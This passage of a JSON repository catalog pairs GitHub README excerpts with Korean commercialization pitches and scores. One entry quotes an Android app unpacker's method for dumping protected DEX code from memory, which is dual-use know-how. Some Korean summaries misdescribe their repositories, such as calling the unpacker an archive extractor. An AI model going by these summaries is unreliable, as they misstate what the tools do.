분석\n\n## 왜 보물인가\n스마트폰 앱에서 메뉴를 원형으로 예쁘게 배치하는 디자인 기술로, 사용자 경험을 한 단계 업그레이드할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음식 배달 앱**: 메뉴판을 원형 휠로 표현하여 더 직관적이고 멋진 주문 화면 제공\n2. **피트니스 앱**: 운동 종류를 원형 메뉴로","readme_excerpt":"<a href=\"https://www.ramotion.com/agency/app-development/?utm_source=gthb&utm_medium=repo&utm_campaign=circle-menu-android\"><img src=\"https://github.com/Ramotion/folding-cell/blob/master/header.png\"></a>\n\n<a href=\"https://github.com/Ramotion/circle-menu-android\">\n<img align=\"left\" src=\"https://github.com/Ramotion/circle-menu-android/blob/master/preview.gif\" width=\"480\" height=\"360\" /></a>\n\n<p><h1 align=\"left\">CIRCLE MENU [JAVA]</h1></p>\n\n<h4>A simple, elegant UI menu with a circular layout and material design animations</h4>\n\n\n___\n\n\n<p><h6>We specialize in the designing and coding of custom UI for Mobile Apps and Websites.</h6>\n<a href=\"https://www.ramotion.com/agency/app-development/?utm_source=gthb&utm_medium=repo&utm_campaign=circle-menu-android\">\n<img src=\"https://github.com/ramotion/gliding-collection/raw/master/contact_our_team@2x.png\" width=\"187\" height=\"34\"></a>\n</p>\n<p><h6>Stay tuned for the latest updates:</h6>\n<a href=\"https://goo.gl/rPFpid\" >\n<img src=\"https://i.imgur.com/z","composite_score":0.5109,"license_safety_tag":"safe"},{"name":"ericaltendorf/plotman","github_url":"https://github.com/ericaltendorf/plotman","stars":13,"language":"Python","license":"Apache-2.0","abandonment_months":40,"description":"# plotman 저장소 분석\n\n## 왜 보물인가\n농장이나 대규모 데이터 저장 작업을 자동으로 관리해주는 도구로, 복잡한 작업을 간단하게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 저장 관리 SaaS**\n대용량 파일을 저장하는 개인이나 기업을 위해 자동 정리 및 모니터링 서비스로 판매할 수 있습니다.\n\n**2. 기업 내부 시스템 도","readme_excerpt":"# `plotman`: a Chia plotting manager\n\nThis is a tool for managing [Chia](https://github.com/Chia-Network/chia-blockchain)\nplotting operations.  The tool runs on the plotting machine and provides\nthe following functionality:\n\n- Automatic spawning of new plotting jobs, possibly overlapping (\"staggered\")\n  on multiple temp directories, rate-limited globally and by per-temp-dir\nlimits.\n\n- Rsync'ing of newly generated plots to a remote host (a farmer/harvester),\n  called \"archiving\".\n\n- Monitoring of ongoing plotting and archiving jobs, progress, resources used,\n  temp files, etc.\n\n- Control of ongoing plotting jobs (suspend, resume, plus kill and clean up\n  temp files).\n\n- Both an interactive live dashboard mode as well as command line mode tools.\n\n- (very alpha) Analyzing performance statistics of past jobs, to aggregate on\n  various plotting parameters or temp dir type.\n\nPlotman is designed for the following configuration:\n\n- A plotting machine with an array of `tmp` dirs, a single `tmp2","composite_score":0.5109,"license_safety_tag":"safe"},{"name":"milaan9/01_Python_Introduction","github_url":"https://github.com/milaan9/01_Python_Introduction","stars":5,"language":"Jupyter Notebook","license":"MIT","abandonment_months":31,"description":"# Python 입문 학습 저장소 평가\n\n## 왜 보물인가\n처음 프로그래밍을 배우려는 사람들을 위해 체계적으로 정리된 무료 학습 자료로, 누구나 쉽게 따라 배울 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **온라인 교육 플랫폼**: 개인/기업 대상 파이썬 입문 과정을 SaaS로 판매\n- **기업 교육 서비스**: 신입 사원이나 전직자 대상 내부 교육용 도","readme_excerpt":"<p align=\"center\"> \n<a href=\"https://github.com/milaan9\"><img src=\"https://img.shields.io/static/v1?logo=github&label=maintainer&message=milaan9&color=ff3300\" alt=\"Last Commit\"/></a> \n<!--<img src=\"https://badges.pufler.dev/created/milaan9/01_Python_Introduction\" alt=\"Created\"/>-->\n<!--<a href=\"https://github.com/milaan9/01_Python_Introduction/graphs/commit-activity\"><img src=\"https://img.shields.io/github/last-commit/milaan9/01_Python_Introduction.svg?colorB=ff8000&style=flat\" alt=\"Last Commit\"/> </a>-->\n<a href=\"https://github.com/milaan9/01_Python_Introduction/pulse\" alt=\"Activity\"><img src=\"https://img.shields.io/github/commit-activity/m/milaan9/01_Python_Introduction.svg?colorB=teal&style=flat\" /></a> \n<a href=\"https://hits.seeyoufarm.com\"><img src=\"https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fmilaan9%2F01_Python_Introduction&count_bg=%231DC92C&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=views&edge_flat=false\"/></a>\n<a href=\"https://g","composite_score":0.5109,"license_safety_tag":"safe"},{"name":"Rikj000/MoniGoMani","github_url":"https://github.com/Rikj000/MoniGoMani","stars":232,"language":"Python","license":"GPL-3.0","abandonment_months":39,"description":"# MoniGoMani 상용화 분석\n\n## 왜 보물인가\n자동으로 암호화폐 거래를 최적화하는 도구로, 투자자들이 더 나은 수익을 얻도록 돕는 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래 플랫폼 SaaS**: 일반 투자자가 구독하며 자동 거래 신호를 받는 웹 서비스\n2. **증권사 내부 도구**: 기관투자자를 위한 포트폴리오 최적화","readme_excerpt":"<p align=\"center\">\n        <img src=\"https://repository-images.githubusercontent.com/352191040/43a50e00-ab61-11eb-92c9-fb91d458e8af\" alt=\"MoniGoMani\" height=\"250\" />\n</p>\n\n<p align=\"center\" style=\"font-family: 'Segoe Script'\">\n    <i><b style=\"font-size: 2em;\">MoniGoMani</b><br>Freqtrade Framework & Strategy</i>\n</p>\n\n<p align=\"center\">\n    <a href=\"https://matrix.to/#/+moni-go-mani:matrix.org\">\n        <img src=\"https://img.shields.io/matrix/MoniGoMani-Testing:matrix.org?label=Matrix%20Community&logo=matrix\" alt=\"Join MoniGoMani on Matrix\">\n    </a> <a href=\"https://discord.gg/xFZ9bB6vEz\">\n        <img src=\"https://img.shields.io/discord/819237123009150977?label=Discord%20Server&logo=discord\" alt=\"Join MoniGoMani on Discord\">\n    </a> <a href=\"https://github.com/Rikj000/MoniGoMani/releases\">\n        <img src=\"https://img.shields.io/github/downloads/Rikj000/MoniGoMani/total?label=Total%20Downloads&logo=github\" alt=\"Total Releases Downloaded from GitHub\">\n    </a> <a href=\"https://githu","composite_score":0.5108,"license_safety_tag":"restricted"},{"name":"lucidrains/alphafold2","github_url":"https://github.com/lucidrains/alphafold2","stars":6,"language":"Python","license":"MIT","abandonment_months":43,"description":"# alphafold2 저장소 분석\n\n## 왜 보물인가\n단백질의 3차원 구조를 AI로 예측하는 기술으로, 신약 개발과 질병 치료법 연구에 혁명을 일으킬 수 있는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **신약 개발 SaaS**: 제약사가 후보 물질의 구조를 빠르게 분석하는 클라우드 서비스\n2. **연구기관 내부 도구**: 대학과 병원의 생명과학 ","readme_excerpt":"<img src=\"./images/alphafold2.png\" width=\"600px\"></img>\n\n## Alphafold2 - Pytorch (wip)\n\nTo eventually become an unofficial working Pytorch implementation of <a href=\"https://deepmind.com/blog/article/alphafold-a-solution-to-a-50-year-old-grand-challenge-in-biology\">Alphafold2</a>, the breathtaking attention network that solved CASP14. Will be gradually implemented as more details of the architecture is released.\n\nOnce this is replicated, I intend to fold all available amino acid sequences out there in-silico and release it as an academic torrent, to further science. If you are interested in replication efforts, please drop by #alphafold at this <a href=\"https://discord.gg/GgDBFP8ZEt\">Discord channel</a>\n\nUpdate: Deepmind has open sourced the official <a href=\"https://github.com/deepmind/alphafold\">code</a> in Jax, along with the weights 🙏! This repository will now be geared towards a straight pytorch translation with some improvements on positional encoding\n\n<a href=\"https://www.youtub","composite_score":0.5108,"license_safety_tag":"safe"},{"name":"jez/as-tree","github_url":"https://github.com/jez/as-tree","stars":499,"language":"Rust","license":"NOASSERTION","abandonment_months":56,"description":"# jez/as-tree 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터를 시각적인 나무 모양으로 쉽게 표현해주는 도구로, 누구나 직관적으로 정보 구조를 이해할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 조직도 자동 생성 서비스로 기업 인력 구조를 한눈에 시각화하는 웹 애플리케이션\n- **내부 업무 도구**: 프로젝트 관리 시스템에","readme_excerpt":"# as-tree\n\n[![Build Status](https://travis-ci.org/jez/as-tree.svg?branch=master)](https://travis-ci.org/jez/as-tree)\n\nPrint a list of paths as a tree of paths.\n\nFor example, given:\n\n```\ndir1/foo.txt\ndir1/bar.txt\ndir2/qux.txt\n```\n\nit will print:\n\n```\n.\n├── dir1\n│   ├── foo.txt\n│   └── bar.txt\n└── dir2\n    └── qux.txt\n```\n\nThis tool is particularly useful when used with `find` or `fd` to produce such\na list of files. It's similar in spirit to `tree`, but `find` and `fd` tend to\nbe more powerful when it comes to controlling which files to list.\n\nInspired by [this feature request](https://github.com/sharkdp/fd/issues/283).\n\n## Install\n\nThere are pre-built binary releases in the Releases tab.\n\nThis project is written in Rust and builds under both Bazel and Cargo.\n\nTo install from source using Cargo:\n\n```shell\ncargo install -f --git https://github.com/jez/as-tree\n```\n\nTo install from source using Bazel:\n\n```shell\ngit clone https://github.com/jez/as-tree\ncd as-tree\nmake install\n```\n\n## Usage\n","composite_score":0.5107,"license_safety_tag":"unknown"},{"name":"MimiOnuoha/missing-datasets","github_url":"https://github.com/MimiOnuoha/missing-datasets","stars":499,"language":"","license":"unknown","abandonment_months":101,"description":"# Missing Datasets 프로젝트 분석\n\n## 왜 보물인가\n세상에 존재하지만 제대로 정리되지 않은 데이터들을 한 곳에 모아, 데이터 기반 의사결정이 필요한 조직들에게 귀중한 인사이트를 제공할 수 있는 자산입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 데이터 컨설팅 SaaS 서비스**\n- 기업이 \"우리 산업에서 놓친 데이터가 뭘까?\"라고 질문할 때 ","readme_excerpt":"# On Missing Data Sets\n\n*This repo will be periodically updated with more information, links, and topics.*\n\n---\n## Overview\n\n\n### What is a Missing Data Set?\n\n\"Missing data sets\" are my term for the blank spots that exist in spaces that are otherwise data-saturated. My interest in them stems from the observation that within many spaces where large amounts of data are collected, there are often empty spaces where no data live. Unsurprisingly, this lack of data typically correlates with issues affecting those who are most vulnerable in that context. \n\nThe word \"missing\" is inherently normative. It implies both a lack and an ought: something does not exist, but it should. That which should be somewhere is not in its expected place; an established system is disrupted by distinct absence. Just because some type of data doesn't exist doesn't mean it's missing, and the idea of missing data sets is inextricably tied to a more expansive climate of inevitable and routine data collection.\n\n\n\n### ","composite_score":0.5107,"license_safety_tag":"unknown"},{"name":"badtuxx/giropops-monitoring","github_url":"https://github.com/badtuxx/giropops-monitoring","stars":17,"language":"Dockerfile","license":"Apache-2.0","abandonment_months":39,"description":"# Giropops-Monitoring 저장소 분석\n\n## 왜 보물인가\n서버와 시스템의 건강 상태를 자동으로 감시하고 문제가 생기면 알려주는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 모니터링 플랫폼으로 기업 고객에게 월 구독료 받으며 판매\n2. **내부 업무 도구**: 중소기업의 IT팀이 자신들의 서버 상","readme_excerpt":"<p align=\"center\">\n<img alt=\"Discord\" src=\"https://img.shields.io/discord/769953234965889026?label=Pessoas%20no%20Discord&style=plastic\">\n</p>\n\n<p align=\"center\">\n  <a href=\"http://youtube.com/linuxtips?sub_confirmation=1\">\n    <img alt=\"YouTube Channel Subscribers\" src=\"https://img.shields.io/youtube/channel/subscribers/UCJnKVGmXRXrH49Tvrx5X0Sw?style=social\">\n  </a>\n  <a href=\"http://youtube.com/linuxtips?sub_confirmation=1\">\n    <img alt=\"YouTube Channel Views\" src=\"https://img.shields.io/youtube/channel/views/UCJnKVGmXRXrH49Tvrx5X0Sw?style=social\">\n  </a>\n  <a href=\"http://twitch.tv/linuxtips?sub_confirmation=1\">\n    <img alt=\"Twitch Status\" src=\"https://img.shields.io/twitch/status/linuxtips?style=social\">\n  </a>\n  <a href=\"http://github.com/badtuxx\">\n    <img alt=\"GitHub followers\" src=\"https://img.shields.io/github/followers/badtuxx?style=social\">\n  </a>\n  <a href=\"http://twitter.com/badtux_\">\n    <img alt=\"Twitter Follow\" src=\"https://img.shields.io/twitter/follow/badtux_?style=","composite_score":0.5107,"license_safety_tag":"safe"},{"name":"xmartlabs/Xniffer","github_url":"https://github.com/xmartlabs/Xniffer","stars":499,"language":"Swift","license":"MIT","abandonment_months":103,"description":"# Xniffer 프로젝트 분석\n\n## 왜 보물인가\n네트워크 통신 내용을 쉽게 분석하고 모니터링할 수 있는 개발자 도구로, 앱이나 웹서비스의 문제를 빠르게 진단할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 앱 개발사가 고객의 기기에서 발생하는 네트워크 문제를 원격으로 진단해주는 구독 서비스\n2. **내부 업무 도구**: 회사의 ","readme_excerpt":"\n<img src=\"./XnifferLogo.png\" />\n<p align=\"left\">\n<img src=\"https://img.shields.io/badge/platform-iOS-blue.svg?style=flat\" alt=\"Platform iOS\" />\n<a href=\"https://developer.apple.com/swift\"><img src=\"https://img.shields.io/badge/swift4-compatible-4BC51D.svg?style=flat\" alt=\"Swift 4 compatible\" /></a>\n<a href=\"https://github.com/Carthage/Carthage\"><img src=\"https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat\" alt=\"Carthage compatible\" /></a>\n<a href=\"https://cocoapods.org/pods/Xniffer\"><img src=\"https://img.shields.io/cocoapods/v/Xniffer.svg\" alt=\"CocoaPods compatible\" /></a>\n<a href=\"https://raw.githubusercontent.com/xmartlabs/Xniffer/master/LICENSE\"><img src=\"http://img.shields.io/badge/license-MIT-blue.svg?style=flat\" alt=\"License: MIT\" /></a>\n</p>\n\nBy [Xmartlabs SRL](http://xmartlabs.com).\n\n## Introduction\n\nXniffer is a non-intrusive framework for intercepting outgoing requests and their responses between your app and any external service for debugging and performa","composite_score":0.5107,"license_safety_tag":"safe"},{"name":"NathanEpstein/Pavlov.js","github_url":"https://github.com/NathanEpstein/Pavlov.js","stars":498,"language":"C++","license":"unknown","abandonment_months":99,"description":"# Pavlov.js 상업화 분석\n\n## 왜 보물인가\n컴퓨터가 사용자의 행동 패턴을 학습하고 자동으로 반응하도록 만들 수 있는 기술로, 반복적인 업무 자동화에 매우 효과적입니다.\n\n## 어디에 쓸 수 있나\n1. **고객 행동 예측 SaaS**: 온라인 쇼핑몰에서 고객이 클릭하는 패턴을 학습해 자동으로 맞춤 추천상품을 보여주는 서비스\n2. **마케팅 자동화 ","readme_excerpt":"# Pavlov.js\n\n<img src=\"./img/MDP.png\">\n\n## About\n\nPavlov.js uses Markov Decision Processes to implement reinforcement learning. It is written in C++ and compiled to JavaScript. For more on reinforcement learning, check out Andrew Ng's <a href=\"http://cs229.stanford.edu/notes/cs229-notes12.pdf\">notes</a>.\n\n## Installation\n\n`npm install pavlovjs --save`\n\n## Compilation\n\nSimply run `make`. JavaScript code will be in the lib directory.\n\n## Example Usage\n\n<img src=\"./img/example.png\">\n\n(we assume that the prize state automatically leads to a trap state which is never left)\n\n```javascript\nvar module = require('pavlovjs');\n\nvar pavlov = new module.Pavlov();\n\n// transitions and rewards\npavlov.transition({ \"state\": \"A\", \"action\": \"R\", \"state_\": \"B\" });\npavlov.transition({ \"state\": \"B\", \"action\": \"B\", \"state_\": \"D\" });\npavlov.reward(0);\n\npavlov.transition({ \"state\": \"A\", \"action\": \"B\", \"state_\": \"C\" });\npavlov.transition({ \"state\": \"C\", \"action\": \"R\", \"state_\": \"D\" });\npavlov.transition({ \"state","composite_score":0.5107,"license_safety_tag":"unknown"},{"name":"bolan9999/react-native-largelist","github_url":"https://github.com/bolan9999/react-native-largelist","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":51,"description":"# react-native-largelist 상용화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 엄청 많은 데이터를 빠르게 표시할 수 있게 해주는 기술로, 앱 성능을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: SNS 피드 플랫폼이나 전자상거래 앱에서 무한 스크롤 목록을 빠르게 로드하는 기능\n- **내부 업무 도구**: ","readme_excerpt":"<!--\n * @Author: 石破天惊\n * @email: shanshang130@gmail.com\n * @Date: 2021-07-21 13:11:34\n * @LastEditTime: 2021-07-28 16:35:35\n * @LastEditors: 石破天惊\n * @Description: \n-->\n# react-native-largelist\n\n**React-native-largelist** is a very high performance large list component for React-Native. (iOS & Android)\n## Features\n\n* Large data source list component, items reused by group, Less CPU/Memory usage. Never blanks.\n* Fully Cross-platform bounces (iOS & Android).\n* Highly customize Refreshing and Loading. Fully support `react-native-lottie`. More smoothly animation.\n* Big media optimization. (New)\n* Nested support. (New)\n* Paging enabled. (New)\n\n## Preview\n![Preview](./docs/res/LottieRefreshing.gif)\n![Preview](./docs/res/LottieLoading.gif)\n![WaterfallExample](./docs/res/WaterfallExample.gif)\n![PictureExample](./docs/res/PictureExample.gif)\n\n## Installation\n\n```\nyarn add react-native-spring-scrollview react-native-largelist\n\n```\nRN 0.50-59 without pod\n```\nreact-native link react-native-spring-s","composite_score":0.5106,"license_safety_tag":"safe"},{"name":"prscX/react-native-photo-editor","github_url":"https://github.com/prscX/react-native-photo-editor","stars":10,"language":"Java","license":"Apache-2.0","abandonment_months":36,"description":"# react-native-photo-editor 분석\n\n## 왜 보물인가\n스마트폰 앱에서 사진을 직접 편집할 수 있는 기능을 쉽게 추가할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SNS 앱 개발사**: 인스타그램처럼 사진을 올리기 전에 필터와 텍스트를 추가하는 기능 제공\n2. **부동산 중개 앱**: 중개사무소에서 매물 사진을 빠르게 편집","readme_excerpt":"<h1 align=\"center\">\n\n<p align=\"center\">\n  <img src=\"https://lh3.googleusercontent.com/dsJXfHnUx0qvZIB_80F-q0iN18eIqmx6g10bmsVN8R6nEnLQDKvJ9lXCbnPCgDEZMw=s180\"/>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/react-native-photo-editor\"><img src=\"http://img.shields.io/npm/v/react-native-photo-editor.svg?style=flat\" /></a>\n  <a href=\"https://github.com/prscX/react-native-photo-editor/pulls\"><img alt=\"PRs Welcome\" src=\"https://img.shields.io/badge/PRs-welcome-brightgreen.svg\" /></a>\n  <a href=\"https://github.com/prscX/react-native-photo-editor#License\"><img src=\"https://img.shields.io/npm/l/react-native-photo-editor.svg?style=flat\" /></a>\n</p>\n\n\n    ReactNative: Native Photo Editor (Android/iOS)\n\nIf this project has helped you out, please support us with a star 🌟\n</h1>\nThis library is a React Native bridge around native photo editor libraries. It allows you to edit any photo by providing below set of features:\n\n\n* _**Cropping**_\n* _**Adding Images -Stickers-**_\n* _**Addi","composite_score":0.5106,"license_safety_tag":"safe"},{"name":"awslabs/aws-mobile-react-native-starter","github_url":"https://github.com/awslabs/aws-mobile-react-native-starter","stars":5,"language":"JavaScript","license":"Apache-2.0","abandonment_months":72,"description":"# AWS Mobile React Native Starter 분석\n\n## 왜 보물인가\n스마트폰 앱을 만들 때 필요한 기본 틀을 AWS라는 검증된 클라우드 서비스와 함께 제공하므로, 개발자들이 처음부터 모든 것을 만들지 않고 빠르게 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 스타트업이 모바일 앱 기반 구독 서비스(예:","readme_excerpt":"# AWS Mobile React Native Starter App - Serverless Pet Tracker\n\n**This sample application has been archived in favor of [Amplify JS Samples](https://github.com/aws-amplify/amplify-js-samples). While the archived repository will still work, please go +1 this feature request for [Serverless Pet Tracker sample](https://github.com/aws-amplify/amplify-js-samples/issues/14) if you are looking to use this sample.**\n\nBootstrap a React Native application on AWS. This starter automatically provisions a Serverless infrastructure with authentication, authorization, image storage, API access and database operations. It also includes user registration and MFA support. The sample use case is a \"Pet Tracker\" where after a user registers and logs in they can upload pictures of their pet to the system along with information like the birthday or breed.\n\nA companion blog post for this repository can be found in the AWS Mobile Blog: [Announcing: React Native Starter Project with One-Click AWS Deployment an","composite_score":0.5105,"license_safety_tag":"safe"},{"name":"jesseduffield/horcrux-ui","github_url":"https://github.com/jesseduffield/horcrux-ui","stars":499,"language":"Go","license":"MIT","abandonment_months":71,"description":"# Horcrux UI 분석 보고서\n\n## 왜 보물인가\n복잡한 사용자 인터페이스를 간단하게 만들어주는 도구로, 웹서비스 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회계 관리 소프트웨어, CRM, 마케팅 자동화 플랫폼 등 엔터프라이즈 소프트웨어의 UI 개발 가속화\n2. **내부 업무 도구**: 대기업의 사","readme_excerpt":"# Horcrux\n![](/Icon.png)\n\nGUI for Horcrux, made with [fyne.io](https://fyne.io/) (for the command-line version, see [here](https://github.com/jesseduffield/horcrux))\n\n![](https://i.imgur.com/SsKn6Ap.png)\n![](https://i.imgur.com/zKaInY1.png)\n\n# horcrux\n\nSplit your file into encrypted horcruxes so that you don't need to remember a passcode\n\n![](https://i.imgur.com/TijN4YP.png)\n\n\n## How it works\n\nHorcrux has two main functions: creating horcruxes and combining horcruxes\n\n### Creating horcruxes\n\nIf I have a file called `diary.txt` in my current directory I can select that and split it into horcruxes, creating files like so:\n\n```\ndiary_1_of_5.horcrux\ndiary_2_of_5.horcrux\n...\n```\nNow you just need to disperse the horcruxes around the house on various USBs or online locations and hope you can recall where they all are! Or send them to a friend across multiple channels so there's no risk of interception.\n\n### Combining horcruxes\n\nOn the receiving end, you can then recombine the hocruxes back t","composite_score":0.5105,"license_safety_tag":"safe"},{"name":"Youlor/unpacker","github_url":"https://github.com/Youlor/unpacker","stars":34,"language":"C++","license":"unknown","abandonment_months":48,"description":"# Youlor/unpacker 상용화 분석\n\n## 왜 보물인가\n압축된 파일들을 자동으로 풀어주는 도구로, 수많은 파일을 다루는 기업들의 반복적인 수작업을 없애줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 파일 압축 해제 플랫폼 (사용자가 웹사이트에 올리면 자동 변환)\n2. **내부 업무 도구**: 대량의 고객 데","readme_excerpt":"# Youpk\n又一款基于ART的主动调用的脱壳机\n\n\n\n## 原理\n\nYoupk是一款针对Dex整体加固+各式各样的Dex抽取的脱壳机\n\n基本流程如下:\n\n1. 从内存中dump DEX\n2. 构造完整调用链, 主动调用所有方法并dump CodeItem\n3. 合并 DEX, CodeItem\n\n### 从内存中dump DEX\n\nDEX文件在art虚拟机中使用DexFile对象表示, 而ClassLinker中引用了这些对象, 因此可以采用从ClassLinker中遍历DexFile对象并dump的方式来获取.\n\n```c++\n//unpacker.cc\nstd::list<const DexFile*> Unpacker::getDexFiles() {\n  std::list<const DexFile*> dex_files;\n  Thread* const self = Thread::Current();\n  ClassLinker* class_linker = Runtime::Current()->GetClassLinker();\n  ReaderMutexLock mu(self, *class_linker->DexLock());\n  const std::list<ClassLinker::DexCacheData>& dex_caches = class_linker->GetDexCachesData();\n  for (auto it = dex_caches.begin(); it != dex_caches.end(); ++it) {\n    ClassLinker::DexCacheData data = *it;\n    const DexFile* dex_file = data.dex_file;\n    dex_files.push_back(dex_file);\n  }\n  return dex_files;\n}\n```\n\n另外, 为了避免dex做任何形式的优化影响dump下来的dex文件, 在dex2oat中设置 CompilerFilter 为仅验证\n\n```c++\n//dex2oat.cc\ncompiler_options_->SetCompilerFilter(CompilerFilter::kVeri","composite_score":0.5104,"license_safety_tag":"unknown"},{"name":"resumejob/Leetcode-retag","github_url":"https://github.com/resumejob/Leetcode-retag","stars":14,"language":"","license":"unknown","abandonment_months":39,"description":"# Leetcode-retag 사업화 분석\n\n## 왜 보물인가\n프로그래밍 면접 문제들을 더 잘 찾을 수 있도록 정리한 도구로, 코딩 취업 준비생들의 시간 낭비를 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **구직 플랫폼 부가 서비스**: 취업사이트에서 \"당신 수준에 맞는 면접 문제 10개\" 추천 기능으로 제공\n2. **코딩 교육 회사 커리큘럼**:","readme_excerpt":"# Leetcode-retag\n重新分类 Leetcode 高频题 2021 版\n\n- 题目按照面试频率降序排列\n- 增加难度分类，适合从简单开始学习\n- 增加细分类别，例如单调栈，前缀树等，一道题目可能会有多个类别\n\n# 目录\n- [𐀴 链表](#𐀴-链表)\n    - 单链表\n    - 双链表\n- [𐀴 树](#𐀴-树)\n    - 遍历\n    - 构造\n    - 路径 | 深度 | 翻转\n    - 二叉搜索树\n    - 前缀树\n    - * 线段树\n- [𐀴 栈](#𐀴-栈)\n    - 基础\n    - 单调栈\n- [𐀴 堆](#𐀴-堆)\n    - 基础\n- [𐀴 二分查找](#𐀴-二分查找)\n- [𐀴 位运算](#𐀴-位运算)\n- [𐀴 双指针与滑动窗口](#𐀴-双指针与滑动窗口)\n- [𐀴 矩阵](#𐀴-矩阵)\n- [𐀴 动态规划](#𐀴-动态规划)\n    - 一维\n    - 二维\n- [𐀴 图论](#𐀴-图论)\n    - DFS\n    - BFS\n    - * Dijkstra\n    - 拓扑排序\n- [𐀴 并查集](#𐀴-并查集)\n- [𐀴 设计](#𐀴-设计)\n- [𐀴 贪心](#𐀴-贪心)\n- [𐀴 回溯](#𐀴-回溯)\n- [𐀴 克隆](#𐀴-克隆)\n- [𐀴 数学](#𐀴-数学)\n- [𐀴 \\* 极大极小化](#𐀴-极大极小化)\n- [𐀴 \\* 几何](#𐀴-几何)\n\n## 𐀴 链表\n\n#### 单链表：\n\n###### 简单：\n\n- [206. 反转链表](https://leetcode-cn.com/problems/reverse-linked-list/)\n- [141. 环形链表](https://leetcode-cn.com/problems/linked-list-cycle/)\n- [83. 删除排序链表中的重复元素](https://leetcode-cn.com/problems/remove-duplicates-from-sorted-list/)\n- [234. 回文链表](https://leetcode-cn.com/problems/palindrome-linked-list/)\n- [203. 移除链表元素](https://leetcode-cn.com/problems/","composite_score":0.5104,"license_safety_tag":"unknown"},{"name":"wuyr/PathLayoutManager","github_url":"https://github.com/wuyr/PathLayoutManager","stars":12,"language":"Java","license":"Apache-2.0","abandonment_months":56,"description":"# PathLayoutManager 분석 보고서\n\n## 왜 보물인가\n모바일 앱에서 복잡한 화면 배치를 간단하게 만들어주는 도구로, 개발자들의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 노코드 모바일 앱 빌더 플랫폼에서 사용자가 쉽게 화면을 디자인하도록 지원\n2. **내부 업무 도구**: 기업의 앱 개발팀","readme_excerpt":"##  RecyclerView的LayoutManager，轻松实现各种炫酷、特殊效果，再也不怕产品经理为难！\n### 博客详情： https://blog.csdn.net/u011387817/article/details/81875021\n\n### 使用方式:\n#### 添加依赖：\n```\nimplementation 'com.wuyr:pathlayoutmanager:1.0.3'\n```\n\n### APIs:\n|Method|Description|\n|------|-----------|\n|updatePath(Path path)|更新Path|\n|setItemOffset(int itemOffset)|设置Item间距 (单位: px)|\n|setOrientation(int orientation)|设置滑动方向:<br>**RecyclerView.HORIZONTAL** (水平滑动)<br>**RecyclerView.VERTICAL** (垂直滑动)|\n|setScrollMode(int mode)|设置滚动模式:<br>**SCROLL_MODE_NORMAL** (普通模式)<br>**SCROLL_MODE_OVERFLOW** (允许溢出)<br>**SCROLL_MODE_LOOP** (无限循环)<br>|\n|setItemDirectionFixed(boolean isFixed)|设置Item是否保持垂直|\n|setAutoSelect(boolean isAutoSelect)|设置是否开启自动选中效果|\n|setAutoSelectFraction(float position)|设置自动选中的目标落点 (0~1)|\n|setFlingEnable(boolean enable)|设置惯性滚动是否开启|\n|setCacheCount(int count)|设置Item缓存个数|\n|setItemScaleRatio(float... ratios)|设置平滑缩放比例<br>**ratios**: 缩放比例， 数组长度必须是双数，<br>**偶数索引**表示要**缩放的比例**<br>**奇数索引**表示在**路径上的位置** (0~1)<br>奇数索引必须要递增，即越往后的数值应越大<br>例如：<","composite_score":0.5104,"license_safety_tag":"safe"},{"name":"jaystack/repatch","github_url":"https://github.com/jaystack/repatch","stars":499,"language":"TypeScript","license":"MIT","abandonment_months":104,"description":"# Repatch 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션의 데이터 상태를 더 간단하게 관리할 수 있게 해주는 도구로, 개발자들이 복잡한 작업을 덜 고민하고 비즈니스에만 집중할 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **실시간 협업 SaaS** - 여러 사용자가 동시에 같은 데이터를 수정하는 문서 편집기, 프로젝트 관리 도구 같은 서비스","readme_excerpt":"# <a href=\"https://www.npmjs.com/package/repatch\"><img alt=\"Repatch\" src=\"http://jaystack.com/wp-content/uploads/2017/08/repatch-logo.png\" height=\"50px\"></a>\n\n[![npm version](https://img.shields.io/npm/v/repatch.svg?style=flat-square)](https://www.npmjs.com/package/repatch)\n[![npm downloads](https://img.shields.io/npm/dm/repatch.svg?style=flat-square)](https://www.npmjs.com/package/repatch)\n[![corp-check status](https://api.corp-check.corpjs.com/badge?name=repatch)](https://corp-check.corpjs.com/result?name=repatch)\n\n## Dispatch reducers\n\n[Repatch](https://www.npmjs.com/package/repatch) is just a simplified [Redux](https://www.npmjs.com/package/redux), that let you create actions more briefly by dispatching reducers directly.\n\n<img alt=\"draft\" src=\"http://jaystack.com/wp-content/uploads/2017/08/repatch_pl-hand-d2-e1503663114155.png\" width=\"40%\">\n\n```javascript\nstore.dispatch(state => ({ ...state, counter: state.counter + 1 }));\n```\n\n**In this terminology, an action is a function that r","composite_score":0.5104,"license_safety_tag":"safe"},{"name":"Ramotion/garland-view-android","github_url":"https://github.com/Ramotion/garland-view-android","stars":5,"language":"Java","license":"MIT","abandonment_months":75,"description":"# Garland View Android 분석 보고서\n\n## 왜 